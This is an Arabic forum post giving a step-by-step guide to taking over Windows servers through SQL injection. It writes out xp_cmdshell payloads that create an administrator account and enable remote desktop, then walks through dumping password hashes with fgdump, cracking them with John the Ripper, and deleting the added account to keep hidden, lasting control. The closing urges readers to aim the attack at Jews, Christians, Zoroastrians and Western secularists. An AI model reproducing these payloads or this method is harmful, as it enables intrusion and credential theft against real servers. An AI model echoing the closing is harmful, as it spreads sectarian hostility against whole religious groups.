![]() | رقم المشاركة : 1 (permalink) | ||
![]() و في أول مرة و حصريا في منتدى ?id=1;exec%20master..xp_cmdshell 'net user INJ3CT0R-X /add';-- يضيف يوزر إسمه INJ3CT0R-X والباس INJ3CT0R-X كود PHP: ?id=1;exec%20master..xp_cmdshell 'net localgroup administrators INJ3CT0R-X /add';-- وهذا الأمر يضيف اليوزر الذي إسمه INJ3CT0R-Xلمجموعة administrators لكن 90% من السيرفرات عاملة disable لـــ remote desktop ثانيا لو كانت مفعلة تكون داخل الشبكة فقط للحماية لكن هناك حل لهذه المشكلة و هو إعادة تفعيل remote desktop عن طريق هذه الحقنة كود PHP: ?id=1'; EXEC sp_configure 'show advanced options',1 ; RECONFIGURE ; EXEC sp_configure 'xp_cmdshell',1 ; RECONFIGURE ; exec master..xp_cmdshell 'net user INJ3CT0R-X osoud.org/add'; exec master..xp_cmdshell 'net localgroup administrators INJ3CT0R-X/add'; EXECUTE master.dbo.xp_regwrite N'HKEY_LOCAL_MACHINE',N'SYSTEMCurrentControlSetControlTerminal Server',N'fDenyTSConnections',N'REG_DWORD,0;-- سيتم تحقيق الأهداف التالية : 1-تفعيل XP_CMDSHELL في حال تم تعطيله (SQL 2005 يعطل ذلك افتراضيا) 2-إضافة مستخدم المسمى " INJ3CT0R-X" مع كلمة السر "osoud.org" في قاعدة بيانات السيرفر المستهدف 3-إضافة المستخدم "hacker" إلى مجموعة المسؤولين "المحلية" على قاعدة بيانات السيرفر المستهدف المحور الرابع نعود الأن إلى صلب الموضوع وهو الإتصال بالسيرفر و سحب كلمات السر الخطوة الأولى وهي الإتصال عن بعد بإستخدام Rdesktop الخاص بالـ Linux على توزيعة BackTrack 4 ![]() ![]() تم الدخول ![]() نقوم بفتح المتصفح ونحمل برنامج john The Ripper 171 عبر الرابط المُعد مسبقاً ![]() ثم أداة الـــ Fgdump ![]() بعد إنتهاء التحميل نقوم بفك الضغط عن كلا الملفين كل برنامج في مجلد خاص به كما هو موضح في الصورة ![]() الخطوة الموالية هي جلب الهاشات من ملف SAM عن طريق أداة Fgdump نفتح موجه الأوامر Command Prompt وندخل إلى المجلد الذي يحتوي على الــ Fgdump مثلا في هذه الحالة C:\Dowloads\fgdump\Release بتنفيذ الأمر fgdump.exe -c C:\Dowloads\fgdump\Release>fgdump.exe -c بمجرد الضغط على Enter تبدأ الأداة بجلب الهاشات بسرعة فائقة لا تتجاوز ثانية أو ثانيتين وظهور رسالة Passwords Dumped successfully ما يعني نجاح سحب الهاشات من النظام ![]() ستلاحظ عند فتح مجلد الأداة على المسار C:\Dowloads\fgdump\Release ظهور ملف جديد إسمه 127.0.0.1.pwdump الذي يحتوي على جميع الهاشات لو أردنا أن نشاهد محتوى هذا الملف و رؤية الهاشات فيمكننا ذلك كما هو موضح في الصورة الموالية ![]() نقوم بنسخ 127.0.0.1.pwdump ![]() و لصقه داخل مجلد برنامج الــ john على المسار C:\Downloads\john171w\john1701\run كما هو موضح في الصورة ![]() ثم نفتح مرة ثانية موجه الأوامر Command Prompt وندخل على مجلد برنامج الــ john من أجل فك الهاشات الموجودة داخل ملف 127.0.0.1.pwdump على المسار C:\Downloads\john171w\john1701\run بتنفيذ الأمر john-386.exe 127.0.0.1.pwdump هكذا C:\Downloads\john171w\john1701\run>john-386.exe 127.0.0.1.pwdump ![]() بعد ثواني قليلة تبدأ الأداة في فك الهاشات بسرعة كبيرة و قد تستغرق بعضها بضع ساعات أو أكثر على حسب قوة الباسوررد ![]() في حالة ما تم فك الهاش المطلوب خاصة هاش المدير العام أود توضيح نقطة معينة ستجد في بعض الأحيان أن نفس الإسم يظهر مرتين و أمامه باس مختلف بهذا الشكل كود PHP: SABER (saber) me@ (admin:2) find12 (user:1) 123456 (cowboy) 3 (user:2) word (Administrator:2) 1ted (cool:2) mypass (Administrator:1) not001 (admin:1) loseE00 (cool:1) لاحظ معي على سبيل المثال Administrator يوجد (Administrator:1) و (Administrator:2) و كل واحد أمامه باس مختلف عن الأخر لكي أحصل على الباس النهائي أجمع 1+2 بهذا الشكل (Administrator:1) زائد (Administrator:2) يساوي mypass زائد word إذن Administrator =mypassword أما اليوزر الذي ليس بجنبه رقم فالباسوورد الذي يقابله هو النهائي مثل SABER (saber) الآن وبعدما تم الحصول على باسورد الأدمن الرئيسي يجب علينا أن نحذف اليوزر الذي دخلنا به في بادئ الأمر لأن هدفنا هنا هو الإحتفاظ بالسيرفر و الإستفادة منه لأطول مدة ممكنة لأنه لو تركنا اليوزر فسوف يكتشف فريق الأمن الخاص بالسيرفر أو شركة الإستضافة أمرك و يقمون يتغيير كلمات السر و يضيع منك السيرفر. والسبيل إلى ذلك بغاية البساطة...تابع... من start >>>run أكتب داخل خانة الــ run كود PHP: control passwords2 كما هو ملاحظ في الصورة ![]() ستظهر لك نافذة جديدة إسمها User accounts يمكنك من خلالها إضافة يوزر جديد أو تغيير كلمة سر أي مستخدم أو حذفه كما هو موضح في الصورة ![]() ثم تقوم بإختيار إسم المستخدم الذي قمت بالدخول به في بادئ الأمر ثم تضغط على حذف remove ![]() ومبروك عليك السيرفر يا أسد :D وفي الختام أنا أبرأ إلى الله من كل من يستخدم هذه الطريقة في إيذاء إخوانه المسلمين أو الإطلاع على أسرارهم و عوراتهم أو سرقة كلمات سرالأساتذة كما يفعل المشاغب Cyclone ولكن وجهوا سهامكم إلى أعداء الإسلام و المسلمين من الكفار المحاربين من يهود أو نصارى أو مجوس أو أبواق الغرب العلمانين هداهم الله. أحبتي في الله! هذا والله أعلم وما كان من توفيق فمن الله، وما كان من خطأ أو سهو أو زلل أو نسيان فمني ومن الشيطان، والله ورسوله منه براء، وأعوذ بالله أن أذكركم به وأنساه. تحياتي لكم كان معكم Yvah] hglojvr hgfhsg Ygn hgsd'vm ugn sdvtv hg,dk],. hgthag
| |||
| ![]() |
![]() |
مواقع النشر (المفضلة) |
|
|